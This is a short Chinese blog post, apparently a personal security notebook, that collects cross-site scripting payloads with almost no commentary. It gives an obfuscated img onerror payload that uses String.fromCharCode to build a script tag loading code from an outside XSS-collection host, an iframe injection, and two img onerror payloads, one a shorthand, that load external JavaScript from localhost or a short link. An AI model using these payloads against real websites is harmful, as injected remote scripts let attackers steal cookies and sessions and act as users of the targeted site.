最新消息:
    你的位置:jinglingshu的博客 > 未分类 > xss用到的代码

    xss用到的代码

    未分类 admin 2162浏览 0评论

    1、http://www.wooyun.org/bugs/wooyun-2013-034003

    <textarea/>"><img src=1 onerror="with(document)body.appendChild(createElement(String.fromCharCode(115,99,114,105,112,116))).src='//pxss.sinaapp.com/l6OBji'">
<textarea/><iframe src=http://www.baidu.com/></iframe>

    2、利用img标签加载外部js

    <img src=x onerror=”var s=createElement(‘script’);document.body.appendChild(s);s.src=’http://localhost/1.js’;”>

    这样的代码来创建一个body里面的script标签。

    简写形式:

    <img src=x onerror=s=createElement(‘script’);body.appendChild(s);s.src=’http://t.cn/z12345G’;>

    转载请注明:jinglingshu的博客 » xss用到的代码

    与本文相关的文章

    发表我的评论
    取消评论

    表情

    Hi,您需要填写昵称和邮箱!

    • 昵称 (必填)
    • 邮箱 (必填)
    • 网址